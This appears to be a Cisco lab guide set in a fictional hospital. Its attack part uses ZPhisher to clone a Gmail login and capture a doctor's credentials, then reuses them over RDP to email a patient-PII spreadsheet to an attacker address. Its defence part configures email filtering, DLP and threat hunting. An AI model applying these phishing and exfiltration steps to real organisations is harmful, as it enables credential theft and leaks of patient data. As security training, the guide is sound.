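    Everything that made this lure work is visible in the message itself before the user ever sees it: a display name claiming to be the school, a sender domain that is not the school’s, and an .hta attachment. The following Python script is an added example written for this guide, not part of the lab’s scripts or of any Cisco product: it parses a message with the standard library’s email package, flags a display name that shares no significant word with the sender domain, and flags attachments with extensions that execute on double-click. Both sample messages are constructed; the sender domain attacker-example.test, the extension list and the generic-word list are assumptions, while the attachment name WUHS-permslip.hta and the recipient are taken from the lab text.

```python
import os
from email import policy
from email.parser import BytesParser

# Attachment types that run code when double-clicked on Windows; .hta is what the lab's lure uses.
RISKY_EXTENSIONS = {".hta", ".js", ".jse", ".vbs", ".exe", ".scr", ".lnk"}
# Words that say nothing about which organisation a display name refers to (assumed list).
GENERIC_WORDS = {"the", "and", "of", "high", "team", "dept", "office"}

# Constructed message modelled on the lab's lure: a display name claiming to be the school,
# a sender domain that is not the school's, and an .hta attachment.
SAMPLE_LURE = b"""From: "Washington Union High School" <noreply@attacker-example.test>
To: lpeterson@hackmds.com
Subject: Ski trip permission slip
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please save and open the attached permission slip.
--b1
Content-Type: application/octet-stream; name="WUHS-permslip.hta"
Content-Disposition: attachment; filename="WUHS-permslip.hta"
Content-Transfer-Encoding: base64

PGh0bWw+PC9odG1sPg==
--b1--
"""

# Constructed benign message for comparison.
SAMPLE_BENIGN = b"""From: "HackMDs Help Desk" <helpdesk@hackmds.com>
To: lpeterson@hackmds.com
Subject: Maintenance window
Content-Type: text/plain

The file server is down for patching on Saturday.
"""


def name_tokens(display_name):
    """Significant words of a display name, used to test whether it matches the sender domain."""
    words = display_name.lower().replace("-", " ").replace(".", " ").split()
    return {w for w in words if len(w) >= 4 and w not in GENERIC_WORDS}


def analyze_message(raw_bytes):
    """Return a list of findings for one RFC 5322 message; empty means no indicator fired."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_bytes)
    findings = []

    from_hdr = msg["From"]
    if from_hdr is not None and from_hdr.addresses:
        sender = from_hdr.addresses[0]
        domain = sender.domain.lower()
        tokens = name_tokens(sender.display_name)
        # The lure's display name names an organisation that the sender domain does not.
        if tokens and not any(t in domain for t in tokens):
            findings.append(f"display-name-mismatch:{domain}")

    for part in msg.iter_attachments():
        filename = part.get_filename() or ""
        ext = os.path.splitext(filename)[1].lower()
        if ext in RISKY_EXTENSIONS:
            findings.append(f"risky-attachment:{filename}")
    return findings


def verdict(findings):
    """Quarantine anything with an executable attachment; hold the rest for review."""
    if any(f.startswith("risky-attachment:") for f in findings):
        return "quarantine"
    return "review" if findings else "deliver"


if __name__ == "__main__":
    for label, raw in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        found = analyze_message(raw)
        print(label, verdict(found), found)
```

    The display-name check is a heuristic and will produce false positives for legitimate third-party senders (a school mailing from a hosted notification service, for example); in practice it is one signal alongside SPF/DKIM results and attachment policy, which is exactly the layered approach the defense scenario later in this module configures.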

    Expand the Attack to the Doctor Workstation

    In the last section, you were able to use social engineering to get the target, IT administrator Lawrence Peterson, to save and open a malicious email attachment. That attachment created a reverse connection to your Kali Linux host, which was acting as your command and control server. We were able to browse the filesystem of Lawrence Peterson’s workstation and download a file named ‘Physician Training.xlsx’. The contents of that file revealed the usernames and emails of several physicians.

    Let’s further our attack by building upon the intel obtained. You will use the ZPhisher tool to phish one of the doctors’ emails found in ‘Physician Training.xlsx’:

    Procedure


     1   

    Connect to the Kali Linux system from the GUAC server. From the Kali Desktop, open a terminal window by right-clicking on the desktop and selecting Open Terminal

     2   

    Type the following commands to list the content of the script:

    root@kali:~# cd /root/EmailAttack
    root@kali:~# more ./emailattack-step2.sh

     3   

    Take note of the basic content of the script. The first thing you’ll notice is that we check whether zphisher is running. If it is not, we gracefully exit and ask you to first start zphisher. If zphisher is running, we pull the URL generated by zphisher and insert it into the HTML email that we then send to dhowser@hackmds.com. Now that you’ve reviewed what we’re doing, let’s do it. Run emailattack-step2.sh as follows:

    root@kali:~# cd /root/EmailAttack
    root@kali:~# ./emailattack-step2.sh

     4   

    You should see an error that zphisher is not running:

     5   

    As described in the error, open a new terminal window and start ZPhisher as follows:

    root@kali:~# cd /opt/zphisher
    root@kali:~# ./zphisher.sh

     6   

    From the ZPhisher main menu, select option 03 Google, and then choose option 1 for Gmail Old Login Page.

     7   

    ZPhisher will generate a web page that appears exactly like the Classic Gmail Login. It will host that page on a ngrok.io domain and list the URL that you can paste into your email body that gets sent to your target. In the case of our lab, we have done that part for you. This is the CDC customization you see in the red box as shown in the next image.

     8   

    For the CDC lab, we added logic to the emailattack-step2.sh script to automatically pull the ngrok.io URL and insert it into our HTML payload. All you need to do is run the emailattack-step2.sh script. Let’s do that now. Open a new terminal window and run emailattack-step2.sh:

    root@kali:~# cd /root/EmailAttack
    root@kali:~# ./emailattack-step2.sh

     9   

    Log in to the GUAC server and open a session to the DR workstation.

    We sent our phishing email to physician dhowser@hackmds.com. Next, we need to play the role of the physician and open the email.

    Tip: 

    If you see the ZPhisher email error, you need to go back and run ZPhisher again. It may take you a few attempts before you see the message that the email was sent after running ./emailattack-step2.sh

    Note: 

    If you performed a previous lab that involved installing Cisco Secure Endpoint (AMP), you will need to remove it from the doctor’s workstation. Do this by going to the Control Panel within the Dr.’s workstation, choosing Programs and Features, and choosing to remove Cisco AMP for Endpoints Connector.

     10   

    On the DR workstation, open the Outlook email client. You should see a new email that appears to come from Lawrence Peterson, which our phishing script sent to dhowser@hackmds.com:

     11   

    Continue playing the role of the doctor and click the ‘Get Started’ link in the email to log in to the doctor’s Google account. Type dhowser@hackmds.com for your email, and C1sco12345 as your password:

    Tip: 

    You might notice the ngrok.io URL in the browser and think that no savvy user would enter their credentials into a browser that displayed that URL. Well, the typical non-technical user is not savvy, and in a real attack the attackers would register a domain name that appeared close to the domain name being spoofed; for example, gmailgooglelogin.io.

     12   

    Pivot back to your ZPhisher page and you will see the credentials for our target physician have been captured:


    Exfiltrate Patient Records from Dr. Workstation

    From the ‘Physician Training.xlsx’ worksheet exfiltrated earlier in this scenario, we learned the usernames and IP addresses of several doctor workstations. You were able to use ZPhisher to compromise the credentials of one of these doctors. Next, you will use this data to exfiltrate patient record PII from the DR workstation.

    Procedure


     1   

    Connect to the Kali Linux system from the GUAC server. From the Kali Desktop, right-click, and select Open Terminal.

     2   

    Type the following commands to list the content of the script:

    
    
    
    root@kali:~# cd /root/EmailAttack
    root@kali:~# more ./emailattack-step3.sh
    
    
    

    Note: 

    Yes, this is a very simple script. All we are doing here is launching a remote desktop client from Kali Linux with the correct options to attach to DR workstation. We just learned the credentials of our targeted physician (dhowser@hackmds.com), so we can leverage those stolen credentials, coupled with the data we learned earlier in this scenario to login directly to that workstation.

     3   

    Start the attack: Run the script with the following command:

    
    
    
    root@kali:~# ./emailattack-step3.sh
    
    
    
     4   

    You should see the Windows RDP client launch. Click the Other User icon, which will allow us to log in as dhowser.

     5   

    Type the credentials you learned from the ZPhisher attack. Username: hackmds\dhowser and Password: C1sco12345.

     6   

    When logged in, you should see the Windows desktop of user dhowser. Let’s look for anything interesting to exfiltrate. The highest value data would be healthcare records. Open the Windows file explorer and go to the ‘Documents’ directory. You should see a file named Howser-PII.xlsx.

     7   

    Looks like we found some loot! Double-click the file to see what you have found:

    Wow! That confirms that the PII in the filename indeed stands for Personally Identifiable Information. How are we going to exfiltrate this? You could take a screenshot, but what if the file was thousands of lines? Trying to use a file transfer protocol like FTP or SCP might be blocked by the firewall. What other options do we have? How about email?

     8   

    From the Windows taskbar, open Outlook.

     9   

    With Outlook opened, send an email to dcloud@attack.com: Type anything you like for the subject and attach the Howser-PII.xlsx file to the email.

     10   

    Press Send to send the email.


    Mission accomplished! At this point, you have stolen PII data that can be sold on the darknet or used to extort the hospital.

    Defense with Cisco Secure Email

    In this scenario, you will switch to the Defender's side to prevent all the failures that occurred during the last attack. This includes deploying a layered email defense strategy. Cisco Secure Email can block all the techniques you just used as the attacker. It works with what we call the Email Pipeline, which covers incoming and outgoing email.

    Incoming emails can be blocked at the beginning of the connection (the SMTP 3-way handshake) by using reputation filtering, SPF, DKIM, and so on. Cisco Secure Email can detect viruses and malware with multiple detection engines, including McAfee, Sophos and Cisco’s own Talos. Thus, an email can be accepted when the 3-way handshake starts, but it then passes through many controls (the Pipeline) where inconsistencies can be detected. The administrator can handle the email with several options such as:
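    As an added illustration of the first control mentioned above, the following Python evaluates a connecting SMTP client's IP against a domain's SPF record and maps the result to a handshake-time decision. This is example code written for this guide, not lab or Cisco Secure Email code; the TXT records, domains and address ranges are constructed stand-ins for real DNS lookups so that it runs offline.

```python
"""Added example: SPF evaluation for a connecting SMTP client.
Not lab or Cisco Secure Email code; the DNS TXT records below are constructed
stand-ins for real lookups so the example runs offline."""
import ipaddress

# Constructed TXT records (assumption: these domains and prefixes are fictional).
FAKE_DNS_TXT = {
    "hackmds.com": "v=spf1 ip4:203.0.113.0/24 include:_spf.mailrelay.example -all",
    "_spf.mailrelay.example": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 ~all",
}

# SPF qualifiers and the result each produces when its mechanism matches.
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(client_ip, mail_from_domain, dns=FAKE_DNS_TXT, depth=0):
    """Return the SPF result for client_ip claiming to send as mail_from_domain.

    Supports ip4, ip6, include and all; other mechanisms (a, mx, ptr, exists)
    are skipped because they would need further DNS lookups.
    """
    if depth > 10:
        return "permerror"  # RFC 7208 caps lookup-triggering mechanisms at 10
    record = dns.get(mail_from_domain)
    if record is None or not record.lower().startswith("v=spf1"):
        return "none"  # no SPF policy published: nothing to enforce
    ip = ipaddress.ip_address(client_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        matched = False
        if name == "all":
            matched = True
        elif name in ("ip4", "ip6"):
            try:
                # An IPv4 client never matches an ip6 prefix and vice versa.
                matched = ip in ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror"  # malformed prefix in the record
        elif name == "include":
            # include: matches only when the referenced domain returns pass.
            matched = check_spf(client_ip, arg, dns, depth + 1) == "pass"
        else:
            continue
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"  # record exhausted without a match


def connection_decision(spf_result):
    """Map an SPF result to the action a gateway takes at the SMTP handshake."""
    if spf_result == "fail":
        return "reject"
    if spf_result in ("softfail", "permerror"):
        return "accept-and-tag"  # deliver, but let later pipeline checks weigh in
    return "accept"
```

    A hard fail is the only result that justifies rejecting at the handshake; softfail and neutral results are accepted and left to the later pipeline stages (anti-virus, AMP, content filters) that the rest of this scenario configures.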

    In this scenario, we will enable our defense. In this lab you will act as a HackMDS security administrator and configure an incoming email policy to protect IT admin users. Typically, this policy would be applied to all users or a group of users. For the purposes of this lab, we will focus only on protecting Lawrence Peterson.

    Procedure


     1   

    Connect to the Jumphost GUAC server. From the Jumphost, open Firefox and select the ESA tab (which should already be open). You can also type https://smtp.hackmds.com in the URL bar.

     2   

    On the ESA configuration page you will see ‘My Dashboard’ with helpful information about incoming and outgoing emails, detections by type, and so on. Examine the variety of rich data that you can see:

    Now, you will configure your defense on Cisco Secure Email. Cisco Secure Email can be integrated with LDAP or Azure AD (in case you have the Cisco Cloud Email Security Appliance). Let’s define a policy to detect spear phishing attacks.

     3   

    Go to Mail Policies > Incoming Mail Policies.

     4   

    Click Add Policy, and Name your Policy IT_Admin_Policy.

     5   

    Click Add User.

     6   

    You'll see a variety of options. We could add the IT admin group from AD, but in this case we'll focus on Lawrence Peterson, who is an IT Admin. Select Any Sender; on the right, select “Following Recipients” and add lpeterson@hackmds.com, then click OK.

     7   

    Click Submit.

     8   

    Click Commit Changes, and then click Commit Changes again to complete the save.

     9   

    Go to Security Services > Antivirus and choose Sophos.

    Note: 

    You could also enable McAfee, so that you use two detection engines plus Advanced Malware Protection. In this scenario, you are enabling Sophos. For your customer location, you can also enable McAfee.

     10   

    Verify that Anti-Virus Scanning by Sophos Anti-Virus is enabled.

     11   

    Go back to Mail Policies and choose Incoming Mail Policies.

     12   

    Click Anti-Virus. In the Anti-Virus column, click “(use default)”.

     13   

    Look at the available options. Enable Sophos and choose Use Sophos Anti-Virus.

     14   

    For Virus Infected Messages, choose Deliver As Is. The malware will be dropped later with AMP.

     15   

    Click Submit.

     16   

    Next, you will enable Advanced Malware Protection features. Go to Security Services > File Reputation and Analysis.

     17   

    Enable File Reputation and Enable File Analysis.

     18   

    When you have enabled File Analysis, a new screen will display the file types to inspect. Select all and click Submit.

     19   

    Go back to Mail Policies > Incoming Mail Policies.

     20   

    Below the IT_Admin_Policy, hover over (use default) just below the “Advanced Malware Protection” column.

     21   

    Options for Advanced Malware Protection for that policy will appear. Choose to enable file reputation, and for Message with Malware Attachments, select Drop Message.

     22   

    Click Submit to bring up the Incoming Policies Dashboard.

     23   

    At the top right, click Commit Changes.

     24   

    Click Commit Changes.

     25   

    We are very close to testing the defense against spear phishing. Open Putty on the Jumphost and connect to ESA with username “admin” and password “C1sco12345”.

     26   

    When you are logged in, type “tail mail_logs”. This will render a detailed log for the incoming emails.

     27   

    Go back to Kali and execute emailattack-step1.sh in the /root/EmailAttack directory.

     28   

    Look back at the logs. You'll see multiple detection engines, made up of Sophos and AMP. Most real-world deployments enable all detection engines within Cisco Secure Email (Sophos, McAfee, Talos) to have the most rounded detection.

     29   

    In the next example, you will be dropping malware with AMP. Let’s flip over to the ESA GUI and investigate email-based threats.

     30   

    Go to Monitor > Message Tracking.

     31   

    Click Advanced.

     32   

    In the page that displays, observe the field called Cisco Ironport MID.

     33   

    In the next example, you can see the message ID from the previous email (the example here shows "81511," but it will be different for you).

    Note: 

    You can also use other options to filter messages (Envelope sender, Envelope Recipient, Subject, time range, and so on and so forth).

     34   

    Go to the field named Cisco Ironport MID and use the ID number that you saw on the terminal in the previous step. Click Search.

     35   

    Click the details for the result that comes up.

     36   

    You'll see detailed attributes for that message and how it was dropped by ESA.


    Expand Your Defense to Include all Users

    In this scenario, you will focus on the rest of the users (the doctors). You will reuse the Default policy for your defense.

    Tip: 

    You can create as many policies as needed.

    Advanced Malware Protection will be enabled for the rest of the users. ESA policies are matched top down. This means the first policy will match anything associated with the IT Admin group, while the Default policy will match the rest of the users.

    To protect users from phishing and identity impersonation (Forged Email Detection, also known as BEC), ESA can implement content filters. These work by matching one or more conditions within the subject, the body, the headers or the attachments of an email.

    To catch the phishing attack previously used, we'll need to create two content filters. One will be used to detect the forged email and the other to handle the malicious URL. These are very common content filters used by ESA customers.
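    To make the two filters described above concrete before clicking through them, here is an added Python model of a forged-email condition (display name in an IT-admin dictionary, but the address is external) and a suspicious-URL condition (neutral reputation), each with the actions the lab applies: a prepended subject tag, a disclaimer and URL defanging. This is example code written for this guide, not ESA code; the IT_Admins dictionary contents, the reputation verdicts and the sample messages are constructed.

```python
"""Added example: two simplified incoming content filters mirroring the BEC and
Suspicious_URL filters built in this section. Not ESA code; the dictionary,
reputation table and messages are constructed for illustration."""
import re
from email.utils import parseaddr
from urllib.parse import urlparse

ORG_DOMAIN = "hackmds.com"
# Stand-in for the IT_Admins dictionary (assumption: display names of IT staff).
IT_ADMINS = {"Lawrence Peterson", "Sam Example"}
# Stand-in for a URL reputation service (constructed verdicts).
URL_REPUTATION = {"www.cisco.com": "clean", "login-hackmds.example": "neutral"}
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def forged_email_condition(msg):
    """BEC condition: display name is in the dictionary but the address is external."""
    name, addr = parseaddr(msg["headers"].get("From", ""))
    domain = addr.rpartition("@")[2].lower()
    known = {n.lower() for n in IT_ADMINS}
    return name.strip().lower() in known and domain != ORG_DOMAIN


def url_reputation(url):
    host = (urlparse(url).hostname or "").lower()
    return URL_REPUTATION.get(host, "unknown")


def defang(url):
    """Rewrite a URL so mail clients no longer render it as a clickable link."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def apply_incoming_filters(msg):
    """Return (filtered_message, matched_filter_names) for one incoming message."""
    out = {"headers": dict(msg["headers"]), "body": msg["body"], "disclaimers": []}
    matched = []
    # Filter 1: forged email detection -> prepend tag, add SpoofWarning disclaimer.
    if forged_email_condition(msg):
        out["headers"]["Subject"] = "[Possibly Forged] " + out["headers"].get("Subject", "")
        out["disclaimers"].append("SpoofWarning")
        matched.append("BEC")
    # Filter 2: URLs of neutral reputation -> defang them, add Phishing disclaimer.
    urls = [u.rstrip(".,;)") for u in URL_RE.findall(out["body"])]
    neutral = [u for u in urls if url_reputation(u) == "neutral"]
    for u in neutral:
        out["body"] = out["body"].replace(u, defang(u))
    if neutral:
        out["disclaimers"].append("Phishing")
        matched.append("Suspicious_URL")
    return out, matched


# Constructed sample messages (not real mail).
FORGED_MESSAGE = {
    "headers": {"From": "Lawrence Peterson <lpeterson@hackmds-it.example>",
                "Subject": "New password policy"},
    "body": "Please reset your password at http://login-hackmds.example/reset today.",
}
LEGIT_MESSAGE = {
    "headers": {"From": "Lawrence Peterson <lpeterson@hackmds.com>",
                "Subject": "Patch notes"},
    "body": "Release notes: https://www.cisco.com/",
}
```

    The forged condition deliberately keys on the display name rather than the address, because that is what a recipient sees in Outlook; the internal message from the real lpeterson@hackmds.com address passes both filters untouched.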

    Procedure


     1   

    Create a content filter for forged email detection. Go to Mail Policies > Incoming Content Filters.

     2   

    You'll see we already created a filter, so click Add Filter to add the filter we created for you.

     3   

    Name the filter BEC. Now we need to create a condition to match. Under Conditions, click Add Condition and go to Forged Email detection.

     4   

    Choose the Dictionary already created with all the IT Admin employees called IT_Admins.

     5   

    Click OK.

     6   

    Go to Action > Add Action. Choose Add/Edit Header, choose Prepend to the value of existing header as the next picture shows, fill in “[Possibly Forged]”, and click OK.

     7   

    Click Add Action again, and then choose Add Disclaimer Text.

     8   

    Observe that there is a message already created called "SpoofWarning."

     9   

    Click OK.

     10   

    Click Add Action.

     11   

    In the left panel, select Forged Email detection.

     12   

    Click OK.

     13   

    At the bottom right of the Add incoming Content Filter page, click Submit.

     14   

    Click Commit Changes, and then click Commit Changes again.

     15   

    Now, create one more content filter to detect undesirable URLs.

     16   

    Go to Mail Policies > Incoming Content Filters, choose Add Filter, and name it Suspicious_URL.

     17   

    Below Conditions, click Add Condition.

     18   

    Choose Neutral and below “Check URLs within” choose All. Click OK.

     19   

    Go to Actions, choose URL Reputation, and leave the options as the next example shows.

     20   

    Click OK.

     21   

    Add one more Action and select Add Disclaimer Text.

     22   

    Choose the Phishing disclaimer message created for this lab.

     23   

    Click OK.

     24   

    Click Submit.

     25   

    Go to Mail Policies > Incoming Policies.

     26   

    Select the Content Filter column, and then click Default Policy.

     27   

    Select the created content filters. Click Submit and commit changes.

     28   

    In Kali Linux, open two terminal windows and go to the /root/EmailAttack directory in the left terminal (if you execute the emailattack-step2.sh script without executing zphisher.sh first, you'll see a warning). In the right terminal window, execute the ./zphisher.sh script located at /opt/zphisher.

     29   

    After executing ZPhisher, choose option 3 (right terminal).

     30   

    Choose option 01.

    A phishing URL will be generated.

     31   

    Execute the emailattack-step2.sh script in the left terminal window.

     32   

    From the Jumphost, log in to ESA using Putty, which should already be open. If you do not have Putty open, remember to log in with admin as the user name and C1sco12345 as the password. Remember to run the tail mail_logs command. You'll see the ESA's processing for that email and how it's being dropped. If you do not see it, re-run the attack once you have the ESA Putty session open.

    Forged email detection is enforced, and the URL has been defanged. It is always good practice to look at the MID.

     33   

    From ESA Dashboard, go to Message Tracking.

     34   

    Search for the attacker’s email using the search term “New”, because the email subject starts with this word.

     35   

    Click Search.

     36   

    When you see the email, click Show details to see all the related information regarding the detection.


    Defend Outgoing Emails with the Data Loss Prevention Policy

    The last defense step we will perform is adding a DLP policy to defend against an attacker attempting to exfiltrate data over email.
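    The DLP policy built in the steps that follow scans spreadsheet attachments for US Social Security Numbers and quarantines the message while notifying the sender. The added Python below models that policy end to end: an SSN pattern with the issuance rules that weed out obvious false positives, an attachment-type scope, a quarantine decision and masked findings for the notification. This is example code written for this guide, not ESA code; the extracted attachment text, the threshold and the action names are constructed.

```python
"""Added example: a minimal outbound DLP check for US Social Security Numbers in
spreadsheet attachments, modelled on the policy built in this section. Not ESA
code; the attachment text, severity threshold and actions are constructed."""
import re

# Strict SSN shape with separators; lookarounds stop matches inside longer digit runs.
SSN_RE = re.compile(r"(?<![\d-])(\d{3})-(\d{2})-(\d{4})(?![\d-])")
SCANNED_EXTENSIONS = {"xls", "xlsx"}  # matches the Documents > xls, xlsx selection


def is_valid_ssn(area, group, serial):
    """Reject values the SSA never issues, which cuts false positives on other IDs."""
    a, g, s = int(area), int(group), int(serial)
    if a == 0 or a == 666 or a >= 900:
        return False
    return g != 0 and s != 0


def find_ssns(text):
    return [m.group(0) for m in SSN_RE.finditer(text) if is_valid_ssn(*m.groups())]


def mask(ssn):
    """Show only the last four digits so the DLP notification itself does not leak."""
    return "***-**-" + ssn[-4:]


def evaluate_outgoing(message, quarantine_threshold=1):
    """Apply the policy to one outbound message.

    message = {"from": sender, "attachments": [(filename, extracted_text), ...]}
    Returns (verdict, findings) where findings maps filename -> masked matches.
    """
    findings = {}
    for filename, text in message["attachments"]:
        ext = filename.rsplit(".", 1)[-1].lower()
        if ext not in SCANNED_EXTENSIONS:
            continue  # policy is scoped to spreadsheet attachments only
        hits = find_ssns(text)
        if hits:
            findings[filename] = [mask(h) for h in hits]
    total = sum(len(v) for v in findings.values())
    if total >= quarantine_threshold:
        verdict = {"action": "quarantine", "notify": [message["from"]], "matches": total}
    else:
        verdict = {"action": "deliver", "notify": [], "matches": total}
    return verdict, findings


# Constructed sample: text as a DLP engine would extract it from spreadsheet cells.
PII_EXPORT = {
    "from": "dhowser@hackmds.com",
    "attachments": [
        ("Howser-PII.xlsx",
         "Patient,SSN\nA. Patient,123-45-6789\nB. Patient,000-12-3456\n"
         "C. Patient,987-65-4321\nD. Patient,321-54-9876\n"),
    ],
}
PLAIN_NOTE = {
    "from": "dhowser@hackmds.com",
    "attachments": [("notes.txt", "Reference 123-45-6789 is a sample number")],
}
```

    Note the scoping caveat this makes visible: because the policy is limited to xls and xlsx, the same number in a text attachment is delivered. In practice the attachment types to scan should be chosen with that gap in mind.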

    Procedure


     1   

    Go to Mail Policies > Data Loss Prevention (DLP) > DLP Policy Manager.

     2   

    Click Add DLP Policy.

     3   

    There will be predefined options to control outgoing sensitive information. Choose Privacy Protection.

     4   

    You will see many options. Choose Social Security Numbers (US) and click Add.

     5   

    A customization page will be displayed. Click Filter Senders and Recipients.

     6   

    Choose Documents from the drop-down menu, then choose xls and xlsx and click Submit.

     7   

    Go back to Mail Policies > Data Loss Prevention (DLP) and choose DLP Policy Customizations.

     8   

    Click Default Action.

     9   

    Click the drop-down menu by Message Action.

     10   

    On the same page, click Advanced. In the DLP notification section, choose “sender,” and then click Submit.

     11   

    Go to Mail Policies > Outgoing Mail Policies. As with incoming mail policies, you are also able to add different filters here. For this exercise, we will focus on DLP; however, keep in mind that you could also check for outgoing malware, run Antivirus checks, apply connection filters, and more.

     12   

    Right below DLP, click Disable.

     13   

    From the drop-down menu, choose Enable DLP (Customize settings).

     14   

    Click Submit. The outgoing mail policy will be configured similar to the following image.

     15   

    Click Commit Changes.

     16   

    Make a comment (optional), and click Commit Changes again.

     17   

    From the Jumphost, go to the Doctor's machine using the RDP shortcut or use GUAC. With Outlook open, send an email to dcloud@attack.com. Type anything you like for the subject and attach the Howser-PII.xlsx file to the email. Press Send to send the email:

     18   

    You will receive a Mail Delivery System message informing you that the message was identified by your administrator as a policy violation. It will also provide the MID and other details.

     19   

    Go to Monitor > Message Tracking and use the Subject field. Search for the subject you used in your email.

     20   

    Click Show Details.

     21   

    You'll see information about the DLP incident.


    In this scenario, you performed a phishing campaign based on researching a target and exploiting their trust through email. You created a fake email and embedded a link to a malicious resource enabling you to own the victim’s system. This breach enabled you to gain inside access and eventually steal data. You switched roles and worked through how to enable different email-based security defenses using Cisco Secure Email to reduce the risk of future email-based attacks.
    Important: 

    Email continues to be the number one threat vector. You need an enterprise security solution such as Cisco Secure Email to protect your organization and users!

    Threat Hunting with SecureX

    Welcome to the HackMDs security operation center (SOC). For this scenario, we are going to focus on threat hunting. The story is you are working in a SOC, and you are going to perform common threat response tasks. Tasks include:

    • Monitoring and responding to events within your security tools.

    • Working with threat data (provided), which you will need to investigate.

    • Applying automation to improve your response time.

    • Validating why a tool has identified a threat.

    In Scenario 4, you learned how to configure Cisco’s threat response SIEM/SOAR-like tool, known as SecureX. For this scenario, you will start with a pre-configured system and go right into taking actions. The systems leveraged are a shared resource, so it is common to find other dashboards and “left overs” from other labs. Note that we are giving you configuration capabilities, so be mindful of the language you use when naming things.

    Accessing your working environment

    Let’s start off by accessing your working environment. Modern security operation centers start with their extended detection and response platform (XDR), as it’s the centralized place for security data and taking action. Your XDR solution is Cisco SecureX.

    Procedure


     1   

    Locate the Demo Ready icon, located on the Jumphost desktop, and verify that the status is green.

     2   

    Locate the SecureX icon on the Jumphost desktop and double-click it to display the demo launch window.

    Four new tiles are displayed in the demo launch window:

    Note: Return to the demo launch window at any time by clicking the Cisco SecureX v2.1 task, located in the Windows taskbar:

     3   

    Click View on the Talos tile. This displays a threat called Hafnium in a new tab.

    Our example represents anything you hear about and want to hunt for, answering the most common question a SOC deals with: “Is SOMETHING on our network and how does it impact us?”

     4   

    From the demo launch window, click View on the Service Now tile.

     5   

    This will display a tab to log into Service Now. You will need to flip back and forth between the demo launch window and the Service Now tab to copy and paste both the username and password. Once you log in, you should see the Service Now dashboard.

     6   

    From the demo launch window, click View on the Cisco SecureX tile.

    This will display the SecureX landing page in a new tab. You will see some windows open and close. Let the script work, as it is logging into all of the systems SecureX is connected with, saving you time by building the integration between systems.

    Note: Check out Module 4 if you want to learn how to configure a new SecureX environment, including adding integrations between different technology. This lab has already completed this task for you.

    You are now ready to take on threat hunting.

    What is threat hunting?

    Threat hunting is an analyst-centric process that enables organizations to uncover hidden advanced threats, missed by automated preventative and detective controls.

    There are three types of threat hunting:

    1. Intelligence-Driven: You are provided a list of known threats to hunt for.

    2. TTP-Driven: You are provided the tactics, techniques and procedures about threat actors. You are using the TTPs to find the threat, versus knowing what the threat is.

    3. Anomaly-Driven: Hunting for low-prevalence artifacts and outlier behaviors.

    Hunt 1 - Using SecureX Dashboard with an Endpoint Detection and Response Tool

    Threat intelligence can come from many sources. Cisco’s research team, Talos, is the fuel behind Cisco security products as well as one of the largest commercial threat intelligence teams in the world. These teams are supported by unrivaled telemetry and sophisticated systems to create accurate, rapid, and actionable threat intelligence for Cisco customers, products, and services. Talos defends Cisco customers against known and emerging threats, discovers new vulnerabilities in common software, and interdicts threats in the wild before they can further harm the internet at large. Talos maintains the official rule sets of Snort.org, ClamAV, and SpamCop, in addition to releasing many open-source research and analysis tools.

    There are hundreds of other threat intelligence feeds available. We highly recommend questioning a few value points about any threat intelligence feed.

    • How current is the source? You don’t want to use old data.

    • How relevant is the data to your business?

    • How reliable is the threat source?

    • What format is available, and does it work with your existing XDR solution?

    Your session could have dashboards already created or it could be empty. When we run this script, we are pulling in an existing pre-configured Cisco SecureX session so you can go right into threat hunting. These are shared environments, meaning you could see existing dashboards.

    Dashboard widgets are great for quickly seeing the status of certain datapoints, and many offer the ability to click into data results, cross-launching the tool providing the data. For example, if a Cisco Secure Endpoint widget shows a host system is compromised, clicking the data within SecureX will open directly to the screen within Cisco Secure Endpoint that focuses on compromised host systems. The goal is to help you, the threat hunter, research events with the fewest clicks possible.

    Note: Module 4, the Ransomware Scenario, offers the ability to build a SecureX configuration from scratch if you desire to learn that skill.

    Procedure


     1   

    For those that already have existing dashboards, you can create a new dashboard focused on Cisco Secure Endpoint by clicking the Customize button, as shown.

    Then click +Create Dashboard.

    Note: 

    If your demo does not have any existing dashboards, you will see the following screen:

    Click Add Tiles and then click +Create Dashboard to create a new dashboard that summarizes datapoints from our available security tools.

     2   

    Give the new dashboard a name, for example: HackMDS Dashboard.

    Under Available Tiles, notice all of the tools you have available to pull data from as well as to click into from SecureX.

     3   

    Let’s start with AMP. In the list of available tiles, click the AMP for Endpoints item to display a drop-down list of the options for AMP. Scroll through the list and select Summary and MITRE ATT&CK Tactics detected.

    Summary gives a general view of what Cisco Secure Endpoint (formerly called AMP) sees within endpoints. Think of Secure Endpoint as an endpoint detection and response tool that has full visibility into the endpoint it is protecting. SecureX can quickly check all protected hosts for potential malicious artifacts, for example when you hear about a threat and need to know if the file exists within your endpoints.

    MITRE ATT&CK is a very popular threat model used to understand the different techniques and tactics used by threats. Adding this module allows you to map the specifics regarding what behavior Secure Endpoint is seeing within your endpoints.

     4   

    Click Save to display the new dashboard. Use the scroll bar to view the contents of the Summary panel and the AMP for Endpoints panel.

     5   

    Scroll back to the Summary panel and click Computers Compromised.

    This will bring up Cisco Secure Endpoint’s main Overview page.

     6   

    Here you have a summary of all the malicious activity within your endpoints, potential vulnerabilities, types of systems you are managing, and other useful details. For click number two, we will dive into Executed malware. Click that link found under Compromises.

     7   

    Here you will find details on malware that has executed on your systems. If you scroll down, you can “begin work” meaning: start the remediation process. We will stop here as you now know which systems are at risk of compromise and can take the appropriate action to remediate them.


    Hunt 2 - Using SecureX Browser Plugin to Hunt for Known Threat Data

    A common situation is you hear about a threat and need to know how it impacts your organization. Looking back at the Talos page you pulled, this is an example of a resource that has different datapoints including attack signatures and web domains you can use to test against with hopes they have not impacted your business. The same type of data could be found on Facebook, Twitter, blogs, etc. that talk about threat research.

    Rather than going through the extremely tedious task of copying and pasting any threat data, Cisco SecureX offers a browser plugin that can automatically identify, scrape, and leverage any data found within the web browser. We already installed this for you, however, we need to connect it to SecureX.

    Procedure


     1   

    Go to SecureX and choose Administration.

     2   

